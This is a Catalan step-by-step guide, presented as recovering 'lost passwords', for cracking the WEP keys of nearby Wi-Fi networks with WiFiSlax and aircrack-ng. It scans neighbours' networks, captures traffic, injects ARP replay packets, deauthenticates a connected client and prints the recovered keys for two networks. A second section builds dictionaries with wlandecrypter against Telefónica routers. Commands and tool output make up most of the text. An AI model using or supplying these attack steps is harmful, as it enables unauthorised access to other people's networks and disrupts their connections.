Manual per trobar contrasenyes perdudes Arrencar amb CD de WiFiSlax (http://www.wifislax.com/principal/descargas.php). Triga uns 4'....paciència.... Entrar amb root/toor Arrencar Xwindows : startx Si fallés el mode gràfic es poden obrir consoles de text (Alt + Fn) Connectar wireless USB Obrir 3 terminals: Terminal 1 * Comprovar wireless USB: wifislax ~ # iwconfig lo no wireless extensions. eth0 no wireless extensions. rausb0 RT2500USB WLAN Link Quality:0 Signal level:136 Noise level:113 Rx invalid nwid:0 invalid crypt:0 invalid misc:0 * Veure xarxes disponibles: wifislax ~ # airodump-ng rausb0 CH 7 ][ Elapsed: 8 s ][ 2008-03-18 19:30 BSSID 00:0F:21:31:13:DB 00:19:E3:FA:6F:83 00:60:B3:FC:2B:71 00:11:95:9E:D4:5C 00:18:9B:4D:F0:20 00:01:38:A7:3F:73 00:02:CF:55:9C:37 00:60:B3:52:9D:3B 00:1A:2B:69:4A:95 00:A0:C5:81:C2:A8 00:1A:92:6B:B7:66 00:14:7F:31:DF:5F PWR Beacons 41 38 70 42 54 37 38 50 36 40 35 62 2 2 7 4 6 7 6 6 3 5 4 8 #Data, #/s BSSID STATION 00:1A:2B:69:4A:95 00:1C:BF:2F:5C:02 CH MB ENC CIPHER AUTH ESSID 6 5 9 6 11 6 4 9 3 7 1 1 48 54. 54. 54. 48 54. 54. 54. 54 11 48 48 WEP WPA2 WEP OPN WEP WEP WEP WEP WEP WEP OPN WPA WEP CCMP WEP 0 0 0 0 0 0 0 0 39 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 PWR Lost Packets 55 201 39 PSK WEP WEP WEP WEP WEP WEP TKIP PSK anna J+R WLAN_1F Internet_WiFi lucas WLAN_74 WLAN_C6 WLAN_A2 WLAN_91 Xarxa4 WebSTART SpeedTouchD599U Probes * Busquem contrasenya de WLAN_91. Hem de tenir una estació associada (BSSID STATION). Posem el canal perquè el esnifat sigui mes optim. 'captura' es el fitxer de captures: wifislax ~ # airodump-ng rausb0 --bssid 00:1A:2B:69:4A:95 --channel 3 -w captura Terminal 2 * Generar trafic: wifislax ~ # aireplay -3 -b 00:1A:2B:69:4A:95 -h 00:1C:BF:2F:5C:02 -x 512 rausb0 Salvando respuestas ARP en replay_arp-0318-193958.cap Debes iniciar también el airodump para capturar paquetes. leídos 3403 paquetes (conseguidas 0 respuestas ARP), enviados 0 packets... * S'han d'aconseguir ARP. Si no obtenim cap en un temps prudencial passem a l'atac..... Terminal 3 * Desautentificar per aconseguir ARP (Només si no aconseguim ARP): wifislax ~ # aireplay -0 5 -a 00:1A:2B:69:4A:95 -c 00:1C:BF:2F:5C:02 rausb0 * Obtenir clau: wifislax ~ # aircrack-ng -z captura*.cap Opening captura-01.cap Opening captura-02.cap Read 41276 packets. # BSSID ESSID Encryption 1 00:1A:2B:69:4A:95 WLAN_91 WEP (22664 IVs) Choosing first network as target. Attack will be restarted every 5000 captured ivs. Starting PTW attack with 22826 ivs. Aircrack-ng 0.9.1 r511 [00:01:26] Tested 190080/1400000 keys (got 35399 IVs) KB 0 1 2 3 4 5 6 7 8 9 10 11 12 depth 0/ 1 0/ 1 0/ 1 0/ 1 0/ 9 10/ 11 1/ 2 3/ 6 5/ 8 0/ 2 0/ 2 0/ 5 0/ 1 byte(vote) 43( 198) A9( 30( 196) 1E( 30( 192) 64( 31( 202) 49( 44( 170) 33( 32( 157) 19( 30( 186) 77( 30( 161) 8D( 17( 162) 87( 39( 180) C5( 45( 180) AA( 39( 181) B4( 31( 179) F9( 170) 164) 169) 172) 169) 156) 167) 160) 160) 169) 172) 173) 166) B0( 29( 6F( F5( 3E( 20( F7( F4( DC( A5( B7( F0( B7( 169) 161) 169) 165) 164) 156) 162) 160) 160) 165) 168) 170) 165) 6E( B2( 1B( FB( F2( D2( D7( 07( 41( A6( 57( 6C( E5( 168) 161) 164) 165) 162) 156) 160) 158) 159) 163) 165) 170) 164) 93( A2( 54( 71( 4A( 01( DA( 92( B8( D6( 07( 75( 4A( 167) 159) 163) 162) 161) 155) 159) 158) 158) 163) 164) 170) 163) AF( F5( A5( 05( 20( EC( 01( D5( 1A( 26( 2B( C9( BB( 166) 159) 161) 160) 161) 155) 158) 158) 157) 162) 164) 163) 162) KEY FOUND! [ 43:30:30:31:44:32:30:30:32:39:45:39:31 ] (ASCII: C001D20029E91 ) Decrypted correctly: 100% * i ja la tenim!!!!! Manual per trobar contrasenyes de timofònica ESSID WLAN_XX * Buscar xarxes: wifislax ~ # airodump-ng rausb0 * Recuperar ivs: wifislax ~ # airodump-ng rausb0 --bssid 00:60:B3:EC:E6:D9 --channel 9 -w captura CH 9 ][ Elapsed: 1 min ][ 2008-03-28 17:02 BSSID PWR RXQ 00:60:B3:EC:E6:D9 BSSID 35 Beacons 96 #Data, #/s CH 2 9 309 STATION PWR 0 Lost MB ENC 54. WEP Packets CIPHER AUTH ESSID WEP WLAN_3D Probes * Generar diccionari: wifislax ~ # wlandecrypter 00:60:B3:EC:E6:D9 WLAN_3D diccionari wlandecrypter 0.5 - (c) 2006 nilp0inter2k6_at_gmail.com ------------> http://www.rusoblanco.com <-----------[+] [+] [+] [+] [+] BSSID: 00:60:B3:EC:E6:D9 Modelo: Z-com ESSID: WLAN_3D Fichero de claves: diccionari Fichero guardado * Obtenir clau: wifislax ~ # aircrack-ng -w diccionari captura*.cap Aircrack-ng 0.9.1 r511 [00:00:03] Tested 21916 keys (got 8 IVs) KB 0 1 2 3 4 5 6 7 8 9 10 11 12 depth 0/ 0 00( 0/ 0 00( 0/ 0 00( 0/ 0 00( 0/ 0 00( 0/ 0 00( 0/ 0 00( 0/ 0 00( 0/ 0 00( 0/ 0 00( 0/ 0 00( 0/ 0 00( 0/ 0 00( byte(vote) 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 00( 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 00( 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) 0) KEY FOUND! [ 5A:30:30:31:33:34:39:35:35:39:42:33:44 ] (ASCII: Z001349559B3D ) Decrypted correctly: 100% * i ja la tenim!!!!!